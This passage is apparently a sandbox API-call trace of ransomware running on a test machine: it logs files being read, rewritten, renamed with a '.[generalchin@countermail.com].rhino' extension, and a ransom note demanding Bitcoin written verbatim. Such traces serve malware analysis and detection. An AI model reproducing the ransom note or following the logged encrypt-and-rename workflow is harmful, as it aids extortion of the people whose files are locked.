HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\03g4_AE.ppt.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kjwgnxsb5p\\wgsarbbd\\03g4_ae.ppt.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0106.953] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77f1e8 | out: hHeap=0x6d0000) returned 1 [0106.953] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x712898 | out: hHeap=0x6d0000) returned 1 [0106.953] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b2088 | out: hHeap=0x6d0000) returned 1 [0106.953] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x7b07a0 [0106.953] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x79feb8 | out: hHeap=0x6d0000) returned 1 [0106.953] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x7b0718 [0106.953] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xbe) returned 0x23bc208 [0106.953] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7b0718 | out: hHeap=0x6d0000) returned 1 [0106.953] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kjwgnxsb5p\\wgsarbbd\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0106.953] lstrlenA (lpString="All your files have been encrypted due to a security problem with your PC. If you want to restore them, write us to the e-mail:\n1)generalchin@countermail.com\n2)generalchin@smime.ninja (if you do not receive a response from the first mailbox)\n\nYou have to pay for decryption in Bitcoins. The price depends on how fast you write to us.\nAfter payment we will send you the decryption tool that will decrypt all your files.\n\nFree decryption as guarantee\nBefore paying you can send us up to 1 files for free decryption.\nThe total size of files must be less than 500 Kb (non archived), and files should not contain valuable information. (databases,backups, large excel sheets, etc.)\n") returned 676 [0106.953] WriteFile (in: hFile=0x110, lpBuffer=0xcb9dd0*, nNumberOfBytesToWrite=0x2a4, lpNumberOfBytesWritten=0x292f35c, lpOverlapped=0x0 | out: lpBuffer=0xcb9dd0*, lpNumberOfBytesWritten=0x292f35c*=0x2a4, lpOverlapped=0x0) returned 1 [0106.954] CloseHandle (hObject=0x110) returned 1 [0106.954] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23bc208 | out: hHeap=0x6d0000) returned 1 [0106.954] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\E T0i.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kjwgnxsb5p\\wgsarbbd\\e t0i.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0106.955] GetFileSize (in: hFile=0x110, lpFileSizeHigh=0x292f364 | out: lpFileSizeHigh=0x292f364*=0x0) returned 0xa387 [0106.955] LockFile (hFile=0x110, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0xa4a7, nNumberOfBytesToLockHigh=0x0) returned 1 [0106.955] SetFilePointerEx (in: hFile=0x110, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0106.955] ReadFile (in: hFile=0x110, lpBuffer=0x292f324, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x292f304, lpOverlapped=0x0 | out: lpBuffer=0x292f324*, lpNumberOfBytesRead=0x292f304*=0x20, lpOverlapped=0x0) returned 1 [0106.956] SetFilePointerEx (in: hFile=0x110, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0106.956] ReadFile (in: hFile=0x110, lpBuffer=0x2b80040, nNumberOfBytesToRead=0xa387, lpNumberOfBytesRead=0x292f304, lpOverlapped=0x0 | out: lpBuffer=0x2b80040*, lpNumberOfBytesRead=0x292f304*=0xa387, lpOverlapped=0x0) returned 1 [0107.013] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x713820 [0107.014] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713820 | out: hHeap=0x6d0000) returned 1 [0107.014] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x711db8 [0107.014] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x23b0b10 [0107.014] GetLastError () returned 0x0 [0107.014] SetLastError (dwErrCode=0x0) [0107.014] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x711db8 | out: hHeap=0x6d0000) returned 1 [0107.014] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa3aa) returned 0x23ff070 [0107.015] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0b10 | out: hHeap=0x6d0000) returned 1 [0107.016] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x6f0648 [0107.016] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x712898 [0107.016] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f0648 | out: hHeap=0x6d0000) returned 1 [0107.016] SetFilePointerEx (in: hFile=0x110, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0107.016] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x713820 [0107.016] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x713830 [0107.016] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713820 | out: hHeap=0x6d0000) returned 1 [0107.016] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x713820 [0107.016] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713830 | out: hHeap=0x6d0000) returned 1 [0107.016] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x713830 [0107.016] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713820 | out: hHeap=0x6d0000) returned 1 [0107.016] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x713820 [0107.016] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713830 | out: hHeap=0x6d0000) returned 1 [0107.016] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x757ef8 [0107.016] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713820 | out: hHeap=0x6d0000) returned 1 [0107.016] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x757f70 [0107.016] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x757ef8 | out: hHeap=0x6d0000) returned 1 [0107.016] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x7130c0 [0107.016] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x757f70 | out: hHeap=0x6d0000) returned 1 [0107.016] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x7118c0 [0107.016] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7130c0 | out: hHeap=0x6d0000) returned 1 [0107.016] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x711db8 [0107.017] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7118c0 | out: hHeap=0x6d0000) returned 1 [0107.017] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x23b0b10 [0107.017] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x711db8 | out: hHeap=0x6d0000) returned 1 [0107.017] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x6ef848 [0107.017] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0b10 | out: hHeap=0x6d0000) returned 1 [0107.017] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x7148e0 [0107.017] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ef848 | out: hHeap=0x6d0000) returned 1 [0107.017] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x714978 [0107.017] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7148e0 | out: hHeap=0x6d0000) returned 1 [0107.017] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x23c0b40 [0107.017] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714978 | out: hHeap=0x6d0000) returned 1 [0107.017] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x7148e0 [0107.017] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23c0b40 | out: hHeap=0x6d0000) returned 1 [0107.017] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x714e58 [0107.017] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7148e0 | out: hHeap=0x6d0000) returned 1 [0107.017] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x719718 [0107.017] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714e58 | out: hHeap=0x6d0000) returned 1 [0107.017] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x63f) returned 0x719b50 [0107.017] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x719718 | out: hHeap=0x6d0000) returned 1 [0107.017] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x95e) returned 0x23b2088 [0107.017] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x719b50 | out: hHeap=0x6d0000) returned 1 [0107.017] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0d) returned 0x719718 [0107.017] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b2088 | out: hHeap=0x6d0000) returned 1 [0107.018] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1536) returned 0x23b2088 [0107.018] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x719718 | out: hHeap=0x6d0000) returned 1 [0107.018] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1fbf) returned 0x23b35c8 [0107.018] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b2088 | out: hHeap=0x6d0000) returned 1 [0107.018] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2f8d) returned 0x23b5590 [0107.018] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b35c8 | out: hHeap=0x6d0000) returned 1 [0107.018] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4742) returned 0x23f16b8 [0107.018] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b5590 | out: hHeap=0x6d0000) returned 1 [0107.018] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6ad1) returned 0x23b2088 [0107.019] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23f16b8 | out: hHeap=0x6d0000) returned 1 [0107.019] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa028) returned 0x2409428 [0107.019] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b2088 | out: hHeap=0x6d0000) returned 1 [0107.020] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xf02a) returned 0x2413458 [0107.020] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x2409428 | out: hHeap=0x6d0000) returned 1 [0107.020] WriteFile (in: hFile=0x110, lpBuffer=0x2413460*, nNumberOfBytesToWrite=0xa4a7, lpNumberOfBytesWritten=0x292f304, lpOverlapped=0x0 | out: lpBuffer=0x2413460*, lpNumberOfBytesWritten=0x292f304*=0xa4a7, lpOverlapped=0x0) returned 1 [0107.021] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x2413458 | out: hHeap=0x6d0000) returned 1 [0107.021] UnlockFile (hFile=0x110, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0xa4a7, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0107.021] CloseHandle (hObject=0x110) returned 1 [0107.024] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x90) returned 0x7148e0 [0107.024] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0) returned 0x77f1e8 [0107.024] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7148e0 | out: hHeap=0x6d0000) returned 1 [0107.025] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\E T0i.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kjwgnxsb5p\\wgsarbbd\\e t0i.pdf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\E T0i.pdf.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kjwgnxsb5p\\wgsarbbd\\e t0i.pdf.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0107.025] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77f1e8 | out: hHeap=0x6d0000) returned 1 [0107.025] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x712898 | out: hHeap=0x6d0000) returned 1 [0107.025] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23ff070 | out: hHeap=0x6d0000) returned 1 [0107.025] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x7b0718 [0107.025] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7b07a0 | out: hHeap=0x6d0000) returned 1 [0107.026] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x7b07a0 [0107.026] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xbe) returned 0x23bc208 [0107.026] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7b07a0 | out: hHeap=0x6d0000) returned 1 [0107.026] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kjwgnxsb5p\\wgsarbbd\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0107.026] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23bc208 | out: hHeap=0x6d0000) returned 1 [0107.026] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\gfnKOcqFgrM6L\\cs-CZ" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kjwgnxsb5p\\wgsarbbd\\gfnkocqfgrm6l\\cs-cz"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0107.026] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\gfnKOcqFgrM6L\\oAemNaE\\4egQ3W\\o7_4kYcuMGpVw7fWhX.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kjwgnxsb5p\\wgsarbbd\\gfnkocqfgrm6l\\oaemnae\\4egq3w\\o7_4kycumgpvw7fwhx.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0107.026] GetFileSize (in: hFile=0x110, lpFileSizeHigh=0x292f364 | out: lpFileSizeHigh=0x292f364*=0x0) returned 0x168ab [0107.026] LockFile (hFile=0x110, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x169cb, nNumberOfBytesToLockHigh=0x0) returned 1 [0107.027] SetFilePointerEx (in: hFile=0x110, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0107.027] ReadFile (in: hFile=0x110, lpBuffer=0x292f324, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x292f304, lpOverlapped=0x0 | out: lpBuffer=0x292f324*, lpNumberOfBytesRead=0x292f304*=0x20, lpOverlapped=0x0) returned 1 [0107.028] SetFilePointerEx (in: hFile=0x110, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0107.028] ReadFile (in: hFile=0x110, lpBuffer=0x2b80040, nNumberOfBytesToRead=0x168ab, lpNumberOfBytesRead=0x292f304, lpOverlapped=0x0 | out: lpBuffer=0x2b80040*, lpNumberOfBytesRead=0x292f304*=0x168ab, lpOverlapped=0x0) returned 1 [0107.029] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x713820 [0107.029] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713820 | out: hHeap=0x6d0000) returned 1 [0107.029] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x711db8 [0107.030] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x23b0b10 [0107.030] GetLastError () returned 0x0 [0107.030] SetLastError (dwErrCode=0x0) [0107.030] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x711db8 | out: hHeap=0x6d0000) returned 1 [0107.030] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x168ce) returned 0x23ff070 [0107.030] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0b10 | out: hHeap=0x6d0000) returned 1 [0107.030] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x6f0648 [0107.030] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x712898 [0107.030] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f0648 | out: hHeap=0x6d0000) returned 1 [0107.030] SetFilePointerEx (in: hFile=0x110, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0107.030] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x713820 [0107.030] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x713830 [0107.030] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713820 | out: hHeap=0x6d0000) returned 1 [0107.031] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x713820 [0107.031] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713830 | out: hHeap=0x6d0000) returned 1 [0107.031] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x713830 [0107.031] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713820 | out: hHeap=0x6d0000) returned 1 [0107.031] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x713820 [0107.031] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713830 | out: hHeap=0x6d0000) returned 1 [0107.031] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x757f70 [0107.031] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713820 | out: hHeap=0x6d0000) returned 1 [0107.031] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x757ef8 [0107.031] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x757f70 | out: hHeap=0x6d0000) returned 1 [0107.031] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x7130c0 [0107.031] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x757ef8 | out: hHeap=0x6d0000) returned 1 [0107.031] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x7118c0 [0107.031] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7130c0 | out: hHeap=0x6d0000) returned 1 [0107.031] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x711db8 [0107.031] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7118c0 | out: hHeap=0x6d0000) returned 1 [0107.031] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x23b0b10 [0107.031] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x711db8 | out: hHeap=0x6d0000) returned 1 [0107.031] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x6ef848 [0107.031] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0b10 | out: hHeap=0x6d0000) returned 1 [0107.031] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x7148e0 [0107.031] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ef848 | out: hHeap=0x6d0000) returned 1 [0107.031] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x714978 [0107.032] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7148e0 | out: hHeap=0x6d0000) returned 1 [0107.032] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x23c0b40 [0107.032] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714978 | out: hHeap=0x6d0000) returned 1 [0107.032] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x7148e0 [0107.032] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23c0b40 | out: hHeap=0x6d0000) returned 1 [0107.032] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x714e58 [0107.032] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7148e0 | out: hHeap=0x6d0000) returned 1 [0107.032] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x719718 [0107.032] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714e58 | out: hHeap=0x6d0000) returned 1 [0107.032] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x63f) returned 0x719b50 [0107.032] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x719718 | out: hHeap=0x6d0000) returned 1 [0107.032] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x95e) returned 0x23b2088 [0107.032] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x719b50 | out: hHeap=0x6d0000) returned 1 [0107.032] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0d) returned 0x719718 [0107.032] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b2088 | out: hHeap=0x6d0000) returned 1 [0107.032] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1536) returned 0x23b2088 [0107.032] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x719718 | out: hHeap=0x6d0000) returned 1 [0107.032] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1fbf) returned 0x23b35c8 [0107.032] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b2088 | out: hHeap=0x6d0000) returned 1 [0107.032] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2f8d) returned 0x23b5590 [0107.032] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b35c8 | out: hHeap=0x6d0000) returned 1 [0107.032] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4742) returned 0x23f16b8 [0107.032] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b5590 | out: hHeap=0x6d0000) returned 1 [0107.032] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6ad1) returned 0x23b2088 [0107.033] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23f16b8 | out: hHeap=0x6d0000) returned 1 [0107.033] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa028) returned 0x2415948 [0107.033] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b2088 | out: hHeap=0x6d0000) returned 1 [0107.033] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xf02a) returned 0x24c0050 [0107.036] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x2415948 | out: hHeap=0x6d0000) returned 1 [0107.036] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1682d) returned 0x24cf088 [0107.037] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24c0050 | out: hHeap=0x6d0000) returned 1 [0107.038] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x21c32) returned 0x24e58c0 [0107.040] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24cf088 | out: hHeap=0x6d0000) returned 1 [0107.040] WriteFile (in: hFile=0x110, lpBuffer=0x24e58e0*, nNumberOfBytesToWrite=0x169cb, lpNumberOfBytesWritten=0x292f304, lpOverlapped=0x0 | out: lpBuffer=0x24e58e0*, lpNumberOfBytesWritten=0x292f304*=0x169cb, lpOverlapped=0x0) returned 1 [0107.040] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24e58c0 | out: hHeap=0x6d0000) returned 1 [0107.040] UnlockFile (hFile=0x110, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x169cb, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0107.040] CloseHandle (hObject=0x110) returned 1 [0107.046] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0) returned 0x77f1e8 [0107.046] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x14e) returned 0x7148e0 [0107.046] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77f1e8 | out: hHeap=0x6d0000) returned 1 [0107.046] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\gfnKOcqFgrM6L\\oAemNaE\\4egQ3W\\o7_4kYcuMGpVw7fWhX.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kjwgnxsb5p\\wgsarbbd\\gfnkocqfgrm6l\\oaemnae\\4egq3w\\o7_4kycumgpvw7fwhx.doc"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\gfnKOcqFgrM6L\\oAemNaE\\4egQ3W\\o7_4kYcuMGpVw7fWhX.doc.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kjwgnxsb5p\\wgsarbbd\\gfnkocqfgrm6l\\oaemnae\\4egq3w\\o7_4kycumgpvw7fwhx.doc.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0107.047] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7148e0 | out: hHeap=0x6d0000) returned 1 [0107.047] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x712898 | out: hHeap=0x6d0000) returned 1 [0107.047] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23ff070 | out: 